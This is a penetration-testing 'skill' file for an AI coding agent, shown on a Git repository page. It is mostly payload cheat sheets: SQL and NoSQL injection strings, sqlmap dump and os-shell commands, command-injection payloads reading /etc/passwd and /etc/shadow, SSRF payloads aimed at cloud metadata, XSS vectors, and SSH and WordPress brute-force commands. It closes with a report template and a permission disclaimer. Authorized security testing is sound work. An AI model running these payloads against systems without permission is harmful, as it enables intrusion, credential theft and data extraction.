kunthawat/opencode-skill
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Activity
Files
03447d071880b5292722ea688cf7cc82026e77ea
opencode-skill/skills/pentesting/SKILL.md
Kunthawat Greethong 7edf5bc4d0 feat: Import 35+ skills, merge duplicates, add openclaw installer 
Major updates:
- Added 35+ new skills from awesome-opencode-skills and antigravity repos
- Merged SEO skills into seo-master
- Merged architecture skills into architecture
- Merged security skills into security-auditor and security-coder
- Merged testing skills into testing-master and testing-patterns
- Merged pentesting skills into pentesting
- Renamed website-creator to thai-frontend-dev
- Replaced skill-creator with github version
- Removed Chutes references (use MiniMax API instead)
- Added install-openclaw-skills.sh for cross-platform installation
- Updated .env.example with MiniMax API credentials
2026-03-26 11:37:39 +07:00

384 lines
7.0 KiB
Markdown
Raw Blame History

---
name: pentesting
description: |
Penetration testing skill combining SQL injection, command injection, SSRF, HTML injection,
SSH, and WordPress penetration testing. Use when performing security assessments.
---
# Penetration Testing
Comprehensive pentesting skill combining: SQL injection, command injection, SSRF, HTML injection, SSH, and specialized platform testing.
---
## Quick Reference
| Vulnerability | Use Section |
|--------------|-------------|
| SQL Injection | **SQL Injection** |
| Database enumeration | **SQLMap** |
| Command injection | **Command Injection** |
| SSRF | **SSRF Testing** |
| HTML injection | **HTML Injection** |
| SSH testing | **SSH Pentesting** |
| WordPress | **WordPress Testing** |
| Web3 | **Web3 Testing** |
---
## SQL Injection
### Types
1. **In-Band** - Data returned via same channel
2. **Blind** - No data returned, infer from behavior
3. **Time-Based** - Use delays to infer data
4. **Out-of-Band** - Data via alternative channel
### Testing Checklist
```bash
# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
```
### NoSQL Injection
```javascript
// MongoDB
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "function() { return true; }"}
```
### SQLMap
```bash
# Basic scan
sqlmap -u "http://target.com/?id=1"
# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"
# Cookie injection
sqlmap -u "http://target.com/" --cookie="PHPSESSID=abc123"
# Enumerate databases
sqlmap -u "http://target.com/?id=1" --dbs
# Enumerate tables
sqlmap -u "http://target.com/?id=1" -D database_name --tables
# Dump data
sqlmap -u "http://target.com/?id=1" -D database_name -T users --dump
# Shell access
sqlmap -u "http://target.com/?id=1" --os-shell
```
### SQLMap Options
| Option | Description |
|--------|-------------|
| `--dbs` | List databases |
| `-D` | Specify database |
| `--tables` | List tables |
| `-T` | Specify table |
| `--dump` | Extract data |
| `--os-shell` | OS shell access |
| `--batch` | Non-interactive |
| `--risk=3` | High risk tests |
---
## Command Injection
### Testing Checklist
```bash
# Common payloads
; ls
| ls
& ls
&& ls
|| ls
`ls`
$(ls)
| cat /etc/passwd
; cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
# Blind command injection
& sleep 5 &
| sleep 5 &
; sleep 5 &
```
### Filter Bypass
```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
# No quotes
cat /etc/passwd
cat /etc/shadow
# Encoding
echo "Y2F0ICAvZXRjL3Bhc3N3ZA==" | base64 -d
```
---
## SSRF (Server-Side Request Forgery)
### Testing Checklist
```bash
# Localhost
http://127.0.0.1
http://localhost
http://[::1]
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
# Internal services
http://192.168.1.1
http://10.0.0.1
http://internal/
# File access
file:///etc/passwd
dict://localhost:11211/stats
sftp://localhost/
```
### SSRF Bypasses
```bash
# DNS rebinding
http://127.1.1.1
http://0x7f000001
# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31
# IP shortening
http://2130706433
http://017700000001
# IPv6
http://[0:0:0:0:0:ffff:127.0.0.1]
```
---
## HTML Injection
### Testing Checklist
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<marquee onstart=alert(1)>
```
### XSS Contexts
| Context | Payload |
|---------|---------|
| HTML body | `<script>alert(1)</script>` |
| Attribute | `" onmouseover=alert(1) x="` |
| URL | `javascript:alert(1)` |
| CSS | `style="x:expression(alert(1))"` |
| JavaScript | `';alert(1);//` |
---
## SSH Penetration Testing
### Testing Checklist
```bash
# SSH version detection
ssh -s target.com
# Banner grabbing
nc target.com 22
# Authentication testing
hydra -l root -p password ssh://target.com
medusa -h target.com -u root -P passwords.txt -M ssh
# Key authentication
ssh -i key.pem root@target.com
# Weak keys check
./ssh-audit.py target.com
```
### SSH Audit
```bash
# Check SSH config
sshd -T
# Common issues
# - Weak ciphers
# - Old protocol
# - Root login allowed
# - Empty passwords
# - Default keys
```
---
## WordPress Penetration Testing
### Enumeration
```bash
# Version detection
curl -s target.com/ | grep generator
# User enumeration
curl -s "target.com/wp-json/wp/v2/users/"
# Plugins
curl -s "target.com/wp-content/plugins/"
wpscan --url target.com --enumerate p
# Themes
wpscan --url target.com --enumerate t
# Users
wpscan --url target.com --enumerate u
```
### Common Vulnerabilities
```bash
# Plugin vulnerabilities
wpscan --url target.com --enumerate vp
# Password attacks
wpscan --url target.com --passwords wordlist.txt
# XMLRPC
curl -X POST "http://target.com/xmlrpc.php" -d "<?xml version='1.0'?><methodCall><methodName>wp.getUsers</methodName></methodCall>"
# Debug mode
curl -s "target.com/wp-config.php" | grep WP_DEBUG
```
### WPScan
```bash
# Full scan
wpscan --url target.com --enumerate all --api-token YOUR_TOKEN
# Vulnerability scan
wpscan --url target.com --enumerate vpt
# Password attack
wpscan --url target.com -P passwords.txt -U admin
```
---
## Web3 Testing
### Smart Contract Testing
```bash
# Slither - static analysis
slither contract.sol
# Mythril - security analysis
myth analyze contract.sol
# Echidna - fuzzing
echidna contract.sol
# Foundry - testing framework
forge test
```
### Common Vulnerabilities
| Vulnerability | Description |
|--------------|-------------|
| Reentrancy | Withdraw before state update |
| Integer overflow | Math errors in calculations |
| Access control | Missing modifiers |
| Front-running | Transaction ordering |
| Timestamp dependence | Block timestamp manipulation |
---
## OWASP Top 10 (2023)
| A01 | Broken Access Control |
| A02 | Cryptographic Failures |
| A03 | Injection |
| A04 | Insecure Design |
| A05 | Security Misconfiguration |
| A06 | Vulnerable Components |
| A07 | Auth Failures |
| A08 | Data Integrity Failures |
| A09 | Logging Failures |
| A10 | SSRF |
---
## Report Template
### Finding Details
```markdown
## [Finding Title]
**Severity:** Critical / High / Medium / Low / Informational
**CVSS Score:** [0.0-10.0]
**Description:**
[Detailed description of the vulnerability]
**Impact:**
[How this could be exploited and its business impact]
**Steps to Reproduce:**
1. [Step 1]
2. [Step 2]
3. [Step 3]
**Proof of Concept:**
[Code snippets, screenshots, etc.]
**Remediation:**
[How to fix the vulnerability]
**References:**
- [Link 1]
- [Link 2]
```
---
## Legal Disclaimer
> **WARNING:** Only test systems you have explicit written permission to test. Unauthorized penetration testing is illegal.
---
## Best Practices
1. **Get Written Permission** - Before any testing
2. **Define Scope** - Clear boundaries
3. **Document Everything** - Keep detailed notes
4. **Don't Exploit** - Demonstrate impact, don't destroy
5. **Report Responsibly** - Follow responsible disclosure
6. **Prioritize** - Focus on high-impact findings
Reference in New Issue View Git Blame Copy Permalink